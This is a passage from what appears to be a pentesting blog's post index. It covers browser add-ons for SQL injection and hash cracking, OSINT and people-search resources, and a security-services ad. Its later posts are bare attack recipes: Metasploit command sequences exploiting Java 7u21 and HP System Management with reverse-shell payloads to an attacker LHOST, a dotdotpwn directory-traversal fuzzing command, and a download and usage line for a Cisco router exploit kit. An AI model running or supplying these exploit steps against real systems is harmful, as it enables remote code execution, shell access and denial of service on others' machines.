tool for SQL injection testing.Add </span><i><span style="font-size: medium;">SQL Inject Me</span></i><b><span style="font-size: medium;"><br /></span></b><span style="font-size: medium;">add-on to your browser: <a href="https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/">https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/</a></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><b><span style="font-size: medium;">(9)CryptoFox</span></b><span style="font-size: medium;">CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.Add </span><i><span style="font-size: medium;">CryptoFox </span></i><span style="font-size: medium;">add-on to your browser: <a href="https://addons.mozilla.org/en-US/firefox/addon/cryptofox/">https://addons.mozilla.org/en-US/firefox/addon/cryptofox/</a></span></div></div>

Firefox Add-ons for penetration testers

In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary...

+ Read more »

Open source Information Gathering tool-Maltgo

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 0in;"><span style="font-size: small;">Maltego is an open source intelligence and forensics application. It allows you to mine and gather information, and represent the information in a meaningful way. The word "open source" in Maltego means that it gathers information from the open source resources; it does not mean that Maltego is open source software. </span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: small;">Maltego allows you to enumerate Internet infrastructure information, such as: </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Domain names </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> DNS names </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Whois information </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Network blocks </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> IP addresses </span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: small;">It can also be used to gather information about people, such as: </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Companies and organizations related to the person </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> E-mail address related to the person </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Websites related to the person </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Social networks related to the person </span></div><div style="margin-bottom: 0in;">•<span style="font-size: small;"> Phone numbers related to the person </span></div><div style="margin-bottom: 0in;"><span style="font-size: small;">There are more than 70 transforms available in Maltego. The word "transform" refers to the information gathering phase done by Maltego. </span><br /><span style="font-size: small;"> </span></div><div style="margin-bottom: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgBRKvAhPMMbInYLRYKVd_3LjNX1KRvjDMLGxYuTqDiKWoj7OEhtrEZfmoyeaOCCXJdTo_YGWaNHqCwrVw6UiyFhfg1cImlOJeqUfJf-CRAVwrjRjfjPzkO8yQLkHKAjGm5FMM97c1ZYb5/s1600/maltego.jpeg" imageanchor="1"><img alt="Maltego-example" border="0" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgBRKvAhPMMbInYLRYKVd_3LjNX1KRvjDMLGxYuTqDiKWoj7OEhtrEZfmoyeaOCCXJdTo_YGWaNHqCwrVw6UiyFhfg1cImlOJeqUfJf-CRAVwrjRjfjPzkO8yQLkHKAjGm5FMM97c1ZYb5/s640/maltego.jpeg" title="Maltego-example" width="640" /></a></div></div><div style="margin-bottom: 0in;"><br /><a name='more'></a></div></div>

Open source Information Gathering tool-Maltgo

Maltego is an open source intelligence and forensics application. It allows you to mine and gather information, and represent the informati...

+ Read more »

Information Gathering using Public Resources

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="margin-bottom: 0in;">On the Internet, there are several public resources that can be used to collect </div><div style="margin-bottom: 0in;">information regarding a target domain. The benefit of using these resources is that we don't generate network traffic to the target domain directly, so the target domain may not know about our activities. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;">Following are the resources that can be use </div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;">(1)http://www.archive.org :-Contains an archive of websites. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(2)http://www.domaintools.com:-Domain name intelligence. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(3)http://serversniff.net:-Free "Swiss Army Knife" for networking, </div><div style="margin-bottom: 0in;">serverchecks, and routing </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(4)http://centralops.net:-Free online network utilities: domain, e-mail, </div><div style="margin-bottom: 0in;">browser, ping, traceroute, Whois, and so on. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(5)http://www.robtex.com:- Allows you to search for domain and network </div><div style="margin-bottom: 0in;">information. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(6)http://www.pipl.com:-Allows you to search people on the Internet by first </div><div style="margin-bottom: 0in;">and last name, city, state, and country. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(7)http://yoname.com :-Allows you to search for people across social </div><div style="margin-bottom: 0in;">networking sites and blogs. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(8)http://wink.com:-Free search engine to find people by name, phone </div><div style="margin-bottom: 0in;">number, e-mail, website, photo, and so on. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(9)http://www.isearch.com:- Free search engine to find people by name, phone </div><div style="margin-bottom: 0in;">number, and e-mail address. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(10)http://www.tineye.com:- TinEye is a reverse image search engine. We can use </div><div style="margin-bottom: 0in;">TinEye to find out where the image came from, how it is being used, if modified versions of the image exist, or to find higher resolution versions. </div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">(11)http://www.sec.gov/edgar.shtml :- To search for information regarding public listed companies in Securities and Exchange Commission. </div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;"></div></div>

Information Gathering using Public Resources

On the Internet, there are several public resources that can be used to collect information regarding a target domain. The benefit of using ...

+ Read more »

Launching Our Penetration Testing Services

<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><img class="entry-image" height="224" src="http://services.rafayhackingarticles.net/img/got-hacked-rha.jpg" style="background-color: white; border: 0px; display: block; font-family: 'Lucida Sans Unicode', 'Lucida Grande', sans-serif; font-size: 11.111111640930176px; line-height: 20px; margin: 0px auto 25px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;" width="570" /></div>For past couple of months there has been a significant increase in the freelance security testing projects we were doing here at RHA. However, we never officially documented our testing services and a single post defining our services was not enough to reach to a wider audience. Therefore i thought to launch my own Penetration testing/Security testing company and we have named it "<b><a href="http://services.rafayhackingarticles.net/" target="_blank">RHA InfoSec</a></b>".<br /><br /><a name='more'></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://services.rafayhackingarticles.net/" target="_blank"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVNWhr18x4S76ZHDz-YDN7CwAy3XWw0xbvOgw7Mcjm6_QLrCd6diYN81N66qJXmpXtQ2KvX2mWfdkcwCap6R1aAmbJNdBGSCitydLfrsd10x3CyT8mXCyd2o95PLvvwPmbyFboLvHgOW4/s640/Untitled.png" width="577" /></a></div><h4>What We Are offering?</h4><div>We are offering wide range of security testing services, however our major focus would on on the following ones:<br /><br /></div><div><b>1) </b>CMS Security Testing</div><div><b>2) </b>Server Security Testing</div><div><b>3) </b>Network Security Testing</div><div><b>4) </b>Source Code Analysis</div><div><b>5) </b>Denial of service testing. </div></div><h4>WebApplication Penetration Testing</h4>We here at RHA InfoSec are a fan of OWASP methodology, because we believe that it covers almost everything. OWASP testing methodology is recognized and is widely accepted around the globe. Here are contents of OWASP Testing Methodology. <br /><h4>Network Penetration Testing</h4>Networks Pentests are one of the most difficult ones to perform and requires a lot of expertise as networks can be very complex, With the advent of firewall, IDS and IPS. Network Pentesting can be some times very difficult. At RHA Infosec we can perform both Internal and external network Penetration testing on the most complex environments. <br /><h4>CMS Testing</h4>We here at RHA InfoSec specialize in CMS security, we look for vulnerable plugins, and Flash based files and other common Vulnerabilities on your website according to OWASP Standards. In the end we would deliver you a report of the findings Based upon the priorities and the risk, along with it we also write the countermeasures that you need to take in order to eliminate the vulnerabilities. <b><br /></b><br /><h4>Got Hacked?</h4>If you have got your website defaced or hacked and looking for a prompt response, we have created an emergency page dedicated to our customers who have got their website hacked and looking for an immediate review on their website.<br /><br />Our emergency page is located <a href="http://services.rafayhackingarticles.net/911.html" target="_blank">here</a>.</div><h4>Your Feedback</h4><div>RHA wouldn't had grown as much as it's today, if you people didn't motivate me, I want to hear your feedback regarding our newly launched company. Suggestions/critics are welcomed in order to improve our website.<br /><br /><b>P.S</b> I would like to specially thank our blog reader "<b>Muhammad Gazzaly</b>" for designing our services site. </div></div>

Launching Our Penetration Testing Services

For past couple of months there has been a significant increase in the freelance security testing projects we were doing here at RHA. Howeve...

+ Read more »

Exploit for Java version 7u21 and earlier

<div dir="ltr" style="text-align: left;" trbidi="on">Java Applet ProviderSkeleton Insecure Invoke Method:-<br /><br />This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.<br /><br />Exploit Targets<br /><br />    0 - Generic (Java Payload) (default)<br />    1 - Windows x86 (Native Payload)<br />    2 - Mac OS X x86 (Native Payload)<br />    3 - Linux x86 (Native Payload)<br /><br />$ msfconsole<br />msf > use exploit/multi/browser/java_jre17_provider_skeleton<br />msf exploit(java_jre17_provider_skeleton) > show payloads<br />msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp<br />msf exploit(java_jre17_provider_skeleton) > set LHOST [MY IP ADDRESS]<br />msf exploit(java_jre17_provider_skeleton) > exploit <br /><br /><br /><br /><br /><br /></div>

Exploit for Java version 7u21 and earlier

Java Applet ProviderSkeleton Insecure Invoke Method:- This module abuses the insecure invoke() method of the ProviderSkeleton class that all...

+ Read more »

How to exploit Directory traversal vulnerability?

<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-family: inherit;">Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previously i post about <a href="http://tipstrickshack.blogspot.com/2013/02/how-to-bypassing-filter-to-traversal_8831.html" target="_blank">what is directory traversal & how to bypass its filter</a> , but that process is manual, it can consume lots of time.But in bactrack automatic tools are available for this test which is DOTDOTPWN.<br /><br />If you are on other distro , then you can download it form <a href="http://dotdotpwn.blogspot.com/" target="_blank">here</a>.<br /><br />It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. <br /><br />Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.<br /><br />It's written in perl programming language and can be run either under *NIX or Windows platforms. It's the first Mexican tool included in BackTrack Linux .</span><br /><span style="font-family: inherit;"><br /></span><br /><h3 style="text-align: left;"><span style="font-family: inherit;">Fuzzing modules supported in this version: </span></h3><div style="text-align: left;"></div><span style="font-family: inherit;"><br />- HTTP<br /><br />- HTTP URL<br /><br />- FTP<br /><br />- TFTP<br /><br />- Payload (Protocol independent)<br /><br />- STDOUT</span><br /><a name='more'></a><br /><span style="font-family: inherit;">./dotdotpwn.pl -m  http-url -S -u https://localhost/mutillidae/index.php?page=TRAVERSAL -k root -o unix</span><span style="font-family: inherit;">    </span><br /><div class="separator" style="clear: both; text-align: center;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBGsz8liuK3ExRPc9ZN4PzEC5qECzl4QCBqPvrtTXqSU9cGDNFwNb657ne-lzSidwu5Pn1WLgdOjBR1QNNZNGlUCf2UtnGnmClBsWwK-LPXStBWh5S5GL3RezcUHywqvU2_Hc8GM9oK7Cj/s1600/Path-traversal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="path-traversal" border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBGsz8liuK3ExRPc9ZN4PzEC5qECzl4QCBqPvrtTXqSU9cGDNFwNb657ne-lzSidwu5Pn1WLgdOjBR1QNNZNGlUCf2UtnGnmClBsWwK-LPXStBWh5S5GL3RezcUHywqvU2_Hc8GM9oK7Cj/s320/Path-traversal.PNG" title="path-traversal" width="320" /></a></span></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">In below figure; you can see vulnerable URL where directory traversal is applicable.</span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicV10V1i-Wo9atneHCv0BoOXRZs-qVygjFKu-JfD51mowuio_T67lTvCg3CnzX5igq2yaGcw9u-a3UazKP8OuMkgOf68gSCGVIutO3hkGDjOaDUXQsFu6srr-pPnHRifSKF66Wy7VLBf8F/s1600/path-traversal-2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="path-traversal" border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicV10V1i-Wo9atneHCv0BoOXRZs-qVygjFKu-JfD51mowuio_T67lTvCg3CnzX5igq2yaGcw9u-a3UazKP8OuMkgOf68gSCGVIutO3hkGDjOaDUXQsFu6srr-pPnHRifSKF66Wy7VLBf8F/s320/path-traversal-2.PNG" title="path-traversal" width="320" /></a></div></div>

How to exploit Directory traversal vulnerability?

Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previo...

+ Read more »

Exploit HP sytem managment

<div dir="ltr" style="text-align: left;" trbidi="on"> There are two modules available for exploitation of hp system management.<br /><br /><b>(1)HP System Management Anonymous Access Code Execution</b><br /><br />This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.<br /><br /><br />Exploit Targets<br /><br />    0 - HP System Management 7.1.1 - Linux (CentOS) (default)<br />    1 - HP System Management 6.3.0 - Linux (CentOS)<br /><br />msfconsole<br />msf > use exploit/linux/http/hp_system_management<br />msf exploit(hp_system_management) > show payloads<br />msf exploit(hp_system_management) > set PAYLOAD generic/shell_reverse_tcp<br />msf exploit(hp_system_management) > set LHOST [MY IP ADDRESS]<br />msf exploit(hp_system_management) > set RHOST [TARGET IP]<br />msf exploit(hp_system_management) > exploit<br /><br /><b>(2)HP System Management Homepage JustGetSNMPQueue Command Injection</b><br /><br />This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution under the context of SYSTEM<br /><br />Exploit Targets<br /><br />    0 - Windows (default)<br /><br />msfconsole<br />msf > use exploit/windows/http/hp_sys_mgmt_exec<br />msf exploit(hp_sys_mgmt_exec) > show payloads<br />msf exploit(hp_sys_mgmt_exec) > set PAYLOAD windows/meterpreter/reverse_tcp<br />msf exploit(hp_sys_mgmt_exec) > set LHOST [MY IP ADDRESS]<br />msf exploit(hp_sys_mgmt_exec) > set RHOST [TARGET IP]<br />msf exploit(hp_sys_mgmt_exec) > exploit<br /><a name='more'></a></div>

Exploit HP sytem managment

 There are two modules available for exploitation of hp system management. (1)HP System Management Anonymous Access Code Execution This modu...

+ Read more »

CIsco Global Exploter

<div dir="ltr" style="text-align: left;" trbidi="on">Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool/ exploit engine, that is able to exploit 14 vulnerabilities in disparate Cisco switches and routers.  CGE is command-line driven perl script which has a simple and easy to use front-end.<br /><br />Vulnerabilities list :<br />[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability<br />[2] - Cisco IOS Router Denial of Service Vulnerability<br />[3] - Cisco IOS HTTP Auth Vulnerability<br />[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability<br />[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability<br />[6] - Cisco 675 Web Administration Denial of Service Vulnerability<br />[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability<br />[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability<br />[9] - Cisco 514 UDP Flood Denial of Service Vulnerability<br />[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability<br />[11] - Cisco Catalyst Memory Leak Vulnerability<br />[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability<br />[13] - 0 Encoding IDS Bypass Vulnerability (UTF)<br />[14] - Cisco IOS HTTP Denial of Service Vulnerability<br /><br />Download from <a href="http://www.4shared.com/file/qbFGseyn/cge.html" target="_blank">here</a><br /><br />Use:-<br /><br />perl cge.pl <target> <vulnerability number> </div>

CIsco Global Exploter

Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool/ exploit engine, that is able to exploit 14 ...

+ Read more »